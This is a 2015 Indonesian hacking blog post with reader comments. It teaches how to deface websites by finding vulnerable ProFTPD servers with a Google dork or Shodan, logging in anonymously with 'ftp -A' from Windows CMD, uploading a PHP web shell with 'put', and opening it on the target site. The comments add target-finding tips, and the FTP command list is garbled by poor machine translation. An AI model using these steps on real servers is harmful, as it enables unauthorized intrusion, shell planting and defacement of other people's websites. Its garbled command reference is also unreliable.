Sunday, 24 May 2015

Tutorial Deface dengan FTP Server Melalui CMD



Ohayou Minnaa >3<
ketemu lagi sama Nuenomaru (Hanya ilusi :p )
btw sebelumnya tau kan apa itu FTP Server <(")
anuu loh Om :p cek di mbah google hahaha

langsung aja yoo:


Dork Google
intext:"ProFTPD 1.3.2c server <debian>"
Atau cari disini Shodan

(Dork kembangin lagi sendiri, jika ingin mendapatkan banyak target vuln and ferawan :'v )

Tutorial


  • Masuk ke CMD anda
  • Ketik cd.. terus hingga masuk dir local disk C ,
  • Setelah itu ketik ftp -A ( Web yang mau di tebas/tusbol )
  • Lihat foto 



  • berarti Anda sudah masuk ke FTP
  • setelah itu ketik lagi
  • put ( nama shellnya , simpen shellnya di Local disk C )
  • Tunggu hingga proses selesai

Jika windows anda tiba tiba muncul firewall notice, klik saja Allow Accsess
nah jika muncul notice PORT command successful di CMD anda saat eksekusi , nah berarti Shell anda berhasil ditanem alias tinggal panen pak
[Image: bacol.gif]

Akses shell: www.target.com/namashellanda.php

Contoh contoh Perintah CMD FTP
ABOR ABOR t transfer file
CWD c hange w Mengurai d irectory 
DELE dele te file remote 
DAFTAR daftar file remote 
MDTM - kembali m o d ification t i m e file 
MKD m a k e a d irectory terpencil 
NLST n ame l i st dari direktori remote 
LULUS - kirim lulus kata 
PASV - masukkan pas si modus v e 
PORT - membuka port data 
PWD p etak w Mengurai d irectory 
QUIT - mengakhiri sambungan 
RETR retr ieve file remote 
RMD r e m ove d irectory terpencil 
RNFR r e n ame fr om 
RNTO r e n ame ke 
SITE - perintah situs -specific 
UKURAN - mengembalikan ukuran file 
Stor stor e file pada remote host 
TYPE - mengatur jenis transfer 
USER - kirim nama pengguna 

Put - Perintah memasukan file


Sekian tutorial Dari Nuenomaru.
Ingat Nuenomaru hanya ilusi Semata wkwkw.
semoga bermanfaat >3< dan maaf bila terjadi kesalahan :'(

Source and thanks to: Hanz


Nuenomaru

Nuenomaru just an illusion in Cyber World



Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

12 comments

saat dorking di shodan , sudah muncul ip server nya kok bang.
terimakasih telah membaca artikel kamii

#Nuenomaru

cara liat hasil gimana bang

hmm coba baca pelan2 bang, diatas kan sudah di tulis, shell akses: www.target.coli/namashell.php
salam sukses bang :D

#Nuenomaru

hahahhahahahahahahahhahahaha,, udh di coba dan nemu yg vuln emang nya om o.O ????
kok bisa dibilang gagal :\

#Nuenomaru

ip bisa dapet dari netstat -an
bisa juga dari arp -a

tulis aja di cmd nanti mpuncul juga hihi

nice trik :D
nih alternatif utk ngintip IP :D
makasih yo mas jack ..

#Nuenomaru

Mas , format shell nya .php? terus nempatin shell nya di Local Disk C di mana nya?

di partisi: C: aja juga dh bisa..
kalo ente naro nya di C:/user/
tinggal command sesuaikan sama lokasi dir shell: pit c:/user

#Nuenomaru

punya gan :v
fb.com/tkjcyberart.go.id :v akwkawk

#Nuenomaru


EmoticonEmoticon